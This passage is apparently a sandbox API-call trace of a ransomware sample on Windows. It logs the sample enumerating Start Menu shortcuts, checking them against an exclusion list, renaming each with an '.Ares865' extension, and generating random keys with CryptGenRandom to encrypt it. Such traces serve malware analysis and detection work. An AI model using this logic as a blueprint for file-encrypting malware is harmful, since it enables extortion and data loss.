Flags=0x8, Size=0x104) returned 0x324fc8 [0067.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.901] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.901] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.901] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.901] CloseHandle (hObject=0x118) returned 1 [0067.901] CloseHandle (hObject=0x12c) returned 1 [0067.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.901] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.901] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14139bde, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x14139bde, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x14328dc1, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Performance Monitor.lnk", cAlternateFileName="PERFOR~1.LNK")) returned 1 [0067.901] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="aoldtz.exe") returned 1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2=".") returned 1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="..") returned 1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="windows") returned -1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="bootmgr") returned 1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="temp") returned -1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="pagefile.sys") returned 1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="boot") returned 1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="ids.txt") returned 1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="ntuser.dat") returned 1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="perflogs") returned 1 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2="MSBuild") returned 1 [0067.902] lstrlenW (lpString="Performance Monitor.lnk") returned 23 [0067.902] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk") returned 87 [0067.902] lstrcpyW (in: lpString1=0x2cce478, lpString2="Performance Monitor.lnk" | out: lpString1="Performance Monitor.lnk") returned="Performance Monitor.lnk" [0067.902] lstrlenW (lpString="Performance Monitor.lnk") returned 23 [0067.902] lstrlenW (lpString="Ares865") returned 7 [0067.902] lstrcmpiW (lpString1="tor.lnk", lpString2="Ares865") returned 1 [0067.902] lstrlenW (lpString=".dll") returned 4 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2=".dll") returned 1 [0067.902] lstrlenW (lpString=".lnk") returned 4 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2=".lnk") returned 1 [0067.902] lstrlenW (lpString=".ini") returned 4 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2=".ini") returned 1 [0067.902] lstrlenW (lpString=".sys") returned 4 [0067.902] lstrcmpiW (lpString1="Performance Monitor.lnk", lpString2=".sys") returned 1 [0067.902] lstrlenW (lpString="Performance Monitor.lnk") returned 23 [0067.902] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk.Ares865") returned 91 [0067.902] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\performance monitor.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\performance monitor.lnk.ares865"), dwFlags=0x1) returned 1 [0067.904] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\performance monitor.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.904] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1232) returned 1 [0067.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.904] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0067.905] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.905] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.905] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x118 [0067.907] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x190000 [0067.907] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.908] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.908] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0067.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0067.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.909] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.909] CloseHandle (hObject=0x118) returned 1 [0067.909] CloseHandle (hObject=0x12c) returned 1 [0067.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.909] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x806d09e0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x806d09e0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x8071cca0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Print Management.lnk", cAlternateFileName="PRINTM~1.LNK")) returned 1 [0067.909] lstrcmpiW (lpString1="Print Management.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.909] lstrcmpiW (lpString1="Print Management.lnk", lpString2="aoldtz.exe") returned 1 [0067.909] lstrcmpiW (lpString1="Print Management.lnk", lpString2=".") returned 1 [0067.909] lstrcmpiW (lpString1="Print Management.lnk", lpString2="..") returned 1 [0067.909] lstrcmpiW (lpString1="Print Management.lnk", lpString2="windows") returned -1 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2="bootmgr") returned 1 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2="temp") returned -1 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2="pagefile.sys") returned 1 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2="boot") returned 1 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2="ids.txt") returned 1 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2="ntuser.dat") returned 1 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2="perflogs") returned 1 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2="MSBuild") returned 1 [0067.910] lstrlenW (lpString="Print Management.lnk") returned 20 [0067.910] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk") returned 83 [0067.910] lstrcpyW (in: lpString1=0x2cce478, lpString2="Print Management.lnk" | out: lpString1="Print Management.lnk") returned="Print Management.lnk" [0067.910] lstrlenW (lpString="Print Management.lnk") returned 20 [0067.910] lstrlenW (lpString="Ares865") returned 7 [0067.910] lstrcmpiW (lpString1="ent.lnk", lpString2="Ares865") returned 1 [0067.910] lstrlenW (lpString=".dll") returned 4 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2=".dll") returned 1 [0067.910] lstrlenW (lpString=".lnk") returned 4 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2=".lnk") returned 1 [0067.910] lstrlenW (lpString=".ini") returned 4 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2=".ini") returned 1 [0067.910] lstrlenW (lpString=".sys") returned 4 [0067.910] lstrcmpiW (lpString1="Print Management.lnk", lpString2=".sys") returned 1 [0067.910] lstrlenW (lpString="Print Management.lnk") returned 20 [0067.910] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk.Ares865") returned 88 [0067.911] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\print management.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\print management.lnk.ares865"), dwFlags=0x1) returned 1 [0067.912] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\print management.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.912] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1262) returned 1 [0067.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.913] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.913] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.913] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0067.913] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.913] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.913] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x118 [0067.915] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0067.915] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.916] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.916] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.917] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.917] CloseHandle (hObject=0x118) returned 1 [0067.917] CloseHandle (hObject=0x12c) returned 1 [0067.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.917] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.917] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c3cfe0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x81c3cfe0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x81c3cfe0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x4e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Security Configuration Management.lnk", cAlternateFileName="SECURI~1.LNK")) returned 1 [0067.917] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.917] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="aoldtz.exe") returned 1 [0067.917] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2=".") returned 1 [0067.917] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="..") returned 1 [0067.917] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="windows") returned -1 [0067.917] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="bootmgr") returned 1 [0067.917] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="temp") returned -1 [0067.918] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="pagefile.sys") returned 1 [0067.918] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="boot") returned 1 [0067.918] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="ids.txt") returned 1 [0067.918] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="ntuser.dat") returned 1 [0067.918] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="perflogs") returned 1 [0067.918] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2="MSBuild") returned 1 [0067.918] lstrlenW (lpString="Security Configuration Management.lnk") returned 37 [0067.918] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk") returned 80 [0067.918] lstrcpyW (in: lpString1=0x2cce478, lpString2="Security Configuration Management.lnk" | out: lpString1="Security Configuration Management.lnk") returned="Security Configuration Management.lnk" [0067.918] lstrlenW (lpString="Security Configuration Management.lnk") returned 37 [0067.918] lstrlenW (lpString="Ares865") returned 7 [0067.918] lstrcmpiW (lpString1="ent.lnk", lpString2="Ares865") returned 1 [0067.918] lstrlenW (lpString=".dll") returned 4 [0067.918] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2=".dll") returned 1 [0067.918] lstrlenW (lpString=".lnk") returned 4 [0067.918] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2=".lnk") returned 1 [0067.918] lstrlenW (lpString=".ini") returned 4 [0067.918] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2=".ini") returned 1 [0067.918] lstrlenW (lpString=".sys") returned 4 [0067.918] lstrcmpiW (lpString1="Security Configuration Management.lnk", lpString2=".sys") returned 1 [0067.918] lstrlenW (lpString="Security Configuration Management.lnk") returned 37 [0067.918] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk.Ares865") returned 105 [0067.918] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\security configuration management.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\security configuration management.lnk.ares865"), dwFlags=0x1) returned 1 [0067.920] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\security configuration management.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.920] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1248) returned 1 [0067.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.920] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0067.921] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.921] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.921] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x118 [0067.922] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0067.923] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.924] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.924] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.924] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.924] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0067.924] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.924] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0067.924] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.924] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.924] CloseHandle (hObject=0x118) returned 1 [0067.925] CloseHandle (hObject=0x12c) returned 1 [0067.925] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.925] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.925] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.925] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7306f2, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1d7306f2, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1d77c9b3, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x508, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="services.lnk", cAlternateFileName="")) returned 1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="aoldtz.exe") returned 1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2=".") returned 1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="..") returned 1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="windows") returned -1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="bootmgr") returned 1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="temp") returned -1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="pagefile.sys") returned 1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="boot") returned 1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="ids.txt") returned 1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="ntuser.dat") returned 1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="perflogs") returned 1 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2="MSBuild") returned 1 [0067.925] lstrlenW (lpString="services.lnk") returned 12 [0067.925] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk") returned 97 [0067.925] lstrcpyW (in: lpString1=0x2cce478, lpString2="services.lnk" | out: lpString1="services.lnk") returned="services.lnk" [0067.925] lstrlenW (lpString="services.lnk") returned 12 [0067.925] lstrlenW (lpString="Ares865") returned 7 [0067.925] lstrcmpiW (lpString1="ces.lnk", lpString2="Ares865") returned 1 [0067.925] lstrlenW (lpString=".dll") returned 4 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2=".dll") returned 1 [0067.925] lstrlenW (lpString=".lnk") returned 4 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2=".lnk") returned 1 [0067.925] lstrlenW (lpString=".ini") returned 4 [0067.925] lstrcmpiW (lpString1="services.lnk", lpString2=".ini") returned 1 [0067.925] lstrlenW (lpString=".sys") returned 4 [0067.926] lstrcmpiW (lpString1="services.lnk", lpString2=".sys") returned 1 [0067.926] lstrlenW (lpString="services.lnk") returned 12 [0067.926] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\services.lnk.Ares865") returned 80 [0067.926] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\services.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\services.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\services.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\services.lnk.ares865"), dwFlags=0x1) returned 1 [0067.927] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\services.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\services.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.927] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1288) returned 1 [0067.927] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.927] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.927] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.927] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0067.928] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.928] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.928] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x118 [0067.930] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x190000 [0067.931] CryptAcquireContextW (in: phProv=0x2ccce04, 